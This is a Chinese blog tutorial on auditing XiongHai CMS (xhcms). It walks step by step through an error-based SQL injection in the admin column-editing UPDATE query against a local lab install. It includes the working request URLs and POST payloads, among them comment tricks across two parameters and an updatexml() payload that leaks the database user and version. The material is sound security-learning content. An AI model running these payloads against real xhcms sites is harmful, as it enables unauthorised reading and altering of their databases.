代码审计(xhcms一处报错注入的利用)

最新推荐文章于 2024-05-05 19:08:50 发布
最新推荐文章于 2024-05-05 19:08:50 发布
阅读量487 收藏 1
点赞数 1
分类专栏: WEB安全 文章标签: SQL注入 代码审计 payload构造 debug调试 报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45691294/article/details/114541648
版权

我们可以通过xhcms来入门代码审计,总结审计的大致思路

文章目录

seay审计系统

这里先可以使用审计系统对大致可能存在的漏洞点进行一个初步的排查,误报率很高,但是可以一个一个分析来达到提高审计效率
在这里插入图片描述

审计过程

这里确实存在很多漏洞,但是我们重点关注一个报错注入
在这里插入图片描述
点击进去,观察一下具体是哪一段代码存在问题
在这里插入图片描述

@mysql_query($query) or die('修改错误:'.mysql_error());

这里确实启用了错误显示,会将sql操作失败的信息打印到页面上,这里就存在报错注入的条件,所以我们现在只需要将我们需要执行的sql语句插入到参数中然后让执行过程报错打印结果
代码片段

if ($type==2){
$query = "UPDATE navclass SET 
name='$name',
keywords='$keywords',
description='$description',
xs='$xs',
px='$px',
tuijian='$tuijian',
date=now()
WHERE id='$id'";
@mysql_query($query) or die('修改错误:'.mysql_error());

echo "<script>alert('亲爱的,二级栏目已经成功编辑。');location.href='?r=columnlist'</script>"; 
exit;
}

要进入到这个代码段我们首先要让$type的值为2,然后接下来我们要通过一个参数将我们构造的攻击语句放入进去,这里我们可以选择参数$name来注入sql语句,接下来就是要把后面拼接的sql语句片段给注释掉,这样就可以达到sql注入的目的

构造payload

但是到这里我们发现了一个问题,后面拼接的sql语句是换行拼接上去的,如果我们只是通过往常的#--这样的单行注释只能起到把该行注释掉,这样会引发错误

name = 1'#

在这里插入图片描述
因此我们需要使用多行注释/**/来注释掉后面拼接的语句,所以我们要再找一个参数,这里只能使用$id这个最后一行的参数

name=1'/*id = */

在这里插入图片描述
中间大部分语句确实被注释掉了,但是多出了一个单引号,我们还要把它做一个注释

name=1'/*id = */#

我们发现这样确实可以达到插入语句并成功执行的目的
但是这个id参数在前面也进行了调用,如果前面就发生了错误脚本终止,那么后面的代码也无法执行

if ($type==2){
$query = "SELECT * FROM nav WHERE id='$id'";
$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());
$nav = mysql_fetch_array($resul);
}

不过我们发现刚才构造的id = */#并不会导致sql执行错误
在这里插入图片描述
我们先看一下这张表初始的数据
在这里插入图片描述

因此我们即可构造出
http://xhcms.loc/admin/?r=editcolumn&type=2&id=1*/#
POST:name=1' where id ='1';/*
在这里插入图片描述

debug调试调整payload

原本构造好的sql语句在服务器是可以正常执行的,但是抓包注入却会报错,在这里我们就可以用debug调试去看看哪里出了问题
在这里插入图片描述
这里发现传入之后,#不见了,可能是编码的问题,可以换成–+,或者直接url编码之后%23传入
http://xhcms.loc/admin/?r=editcolumn&type=2&id=1*/--+
POST:name=1' where id ='1';/*

$query=
UPDATE navclass SET 
name='success' where id ='1';/*',
keywords='',
description='',
xs='1',
px='1',
tuijian='1',
date=now()
WHERE id='1*/-- '

修改成功
在这里插入图片描述
那么既然我们已经可以成功对语句进行控制,那接下来的事就好办了,子查询语句使用报错爆出sql执行结果
http://xhcms.loc/admin/?r=editcolumn&type=2&id=1*/--+
POST:name=1' where id ='1' and updatexml(1,concat(user(),0x7e,version()),1);/*
在这里插入图片描述

$query=
UPDATE navclass SET 
name='1' where id ='1' and updatexml(1,concat(user(),0x7e,version()),1);/*',
keywords='',
description='',
xs='1',
px='1',
tuijian='1',
date=now()
WHERE id='1*/-- '
沫忆末忆
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
xhcms_v.1.0的审计
qq_62536279的博客
11-20 667
新手入门审计,持续更新
【网络安全】xhCMS代码审计思路
HBohan的博客
11-02 1178
前言 最近想提升一下自己的代审能力,虽然之前复现分析了挺多漏洞的,TP,Laravel,Typcho,yii,但一直感觉对代码审计能力提升用处不太大,很多时候链子和利用点都非常简单,可是如何发现的这确实一个难题,所以就拿熊海CMS为例,如何自己挖它里面的漏洞,看看自己能否发现和利用,最后在和网上存在的漏洞进行对比,再看哪里没有发现,为什么没有发现,希望这也能给才入门代码审计的师傅们一点思路吧 【资料】 审计流程 先看一下入口文件index.php,这个文件一般会定义很多变量,包含很多路径,文件进来,我们只需
XHCMS靶场小记(熊海)_xhcms靶场搭建(1),2024年最新从入门到精通系列网络安全高级工程师路线介绍
uiuuyy67的博客
04-15 957
根目录下的index.php文件;r参数用于获取包含文件的名字,如果没有给r参数赋值则执行file文件夹下的index.php文件,如果r有值则包含file文件夹下的对应php文件,没有则返回空。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
xhcms-v1.0 代码审计
最新发布
Aukum的博客
05-05 1097
熊海CMS代码审计,xss,sql,越权,文件包含,任意文件读取
代码审计学习 : xhcms
shinygod的博客
12-10 1267
代码审计xhcms
Xhcms 开源CMS代码审计学习
weixin_53884648的博客
09-26 510
xhcms内容管理系统的渗透测试和代码审计学习
XHcms 1.0代码审计
weixin_44770698的博客
07-11 443
关于熊海cms代码审计(个人学习)
第52天:代码审计-PHP项目类RCE及文件包含下载删除1
08-03
总之,理解并识别这些漏洞的关键字和利用方式对于进行有效的代码审计和防护至关重要。开发者应始终遵循安全编码原则,对用户输入进行严格验证和过滤,避免使用可执行用户输入的危险函数,并定期进行安全审计,以减少...
94xhcms ASP(生成静态)
05-17
内容索引:ASP源码,CMS系统,94xhcms 94xhcms是基于ASP/Access/MSSQL的网站内容管理系统,全站可以生成静态HTML,支持无限级分类、采集、数据库内容替换、自定义标签、自定义模板等功能,加入了AJAX技术,操作体验很...
94xhcms v1.3
04-01
94xhcms v1.3 是一个基于ASP技术构建的内容管理系统(CMS),它以其小巧而精致的特点在开发者中受到关注。CMS系统是用于管理网站内容的软件平台,允许用户无需深入了解HTML或编程语言即可创建、编辑和发布内容。94...
94xhcms v1.3-ASP源码.zip
12-14
【94xhcms v1.3 ASP源码】是一个基于ASP(Active Server Pages)技术构建的网站内容管理系统。ASP是一种由微软开发的服务器端脚本环境,它允许开发者在服务器上编写动态网页并处理用户请求。94xhcms是这类系统的一个...
xhcms_2014:新华网CMS改版DEMO【依赖node-server运行】
05-14
xhcms_2014 新华网CMS改版DEMO【依赖node-server运行】
94xhcms v1.3.rar
07-05
94xhcms是一套免费的ASP内容管理系统,可选择安装ACCESS版和MSSQL版 系统快速稳定,现有功能支持: 无限级分类,建立门户网站也轻而易举 模块化采集,一键实现远程文档本地化 集成自定义表单,满足各种交互应用 自定义可视化标签,模板风格随时更换 更多功能请下载体验... 安装方法:解压后直接运行install (如:127.0.0.1/install)进行安装。 切记,安装完毕后请手动删除 install 文件夹及其下所有文件。
94xhcms内容管理系统 1.3.rar
05-25
94xhcms是一套免费的ASP内容管理系统,可选择安装ACCESS版和MSSQL版 系统快速稳定,现有功能支持: 1.无限级分类,建立门户网站也轻而易举 2.模块化采集,一键实现远程文档本地化 3.集成自定义表单,满足各种交互应用 4.自定义可视化标签,模板风格随时更换
易辰企业建站cms v1.0.rar
07-08
易辰企业建站cms采用.NET ACCESS开发,系统简单,功能完善。 开发环境:Vs2010_access(.net2.0) 后台地址:super/login.aspx 账号和密码分别是: admin  yq761
php代码审计学习笔记-xhcms
2201_75353421的博客
09-28 195
这里主要是跟着迪总的教程进行手把手复现,做的一些学习笔记,只有自己动手做了一遍才能学到东西。
mysql注入审计_代码审计之十余种MySQL报错注入
weixin_36438124的博客
01-19 206
利用数据库报错来显示数据的注入方式经常会在入侵中利用到,这种方法有一点局限性,需要页面有错误回显。而在代码审计中,经常会遇到没有正常数据回显的SQL注入漏洞,这时候我们就需要用报错注入的方式最快地拿到注入的数据。早在很久以前就用到的数据类型转换报错是用得最多的一种方式,这种方式大多用在微软的SQL Server上,利用的是convert()和cast()函数,MySQL的报错SQL注入方式更多,不...
一次失败的JAVA代码审计-SQL注入
Armandhe的博客
03-07 754
一次失败的JAVA代码审计-SQL注入
$http在上传文件的同时传参数_[代码审计] xhcms 文件包含漏洞分析
weixin_42300099的博客
12-26 511
一、初识CMS:熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。目前系统已经集成:代码高亮、广告模块、文件图片上传、图片水印、图片缩略图,智能头像,互动邮件通知等。部份模块添加多种实用功能-目录结构:二、漏洞简介:程序直接将POST接收到...
xhcms csrf漏洞
09-03
抱歉,我没有找到关于xhcms的csrf漏洞的引用内容。可能是因为这个漏洞没有被广泛报道或者没有相关的公开资料。如果您对xhcms的csrf漏洞感兴趣,我建议您参考安全专家、漏洞研究人员或安全社区的讨论和报告,以获取更多关于该漏洞的信息。同时,我也建议您在使用xhcms或其他网站建设框架时,注意及时更新和修补漏洞,以保护自己的网站安全。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【网络安全】xhCMS代码审计思路](https://blog.csdn.net/HBohan/article/details/121098795)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值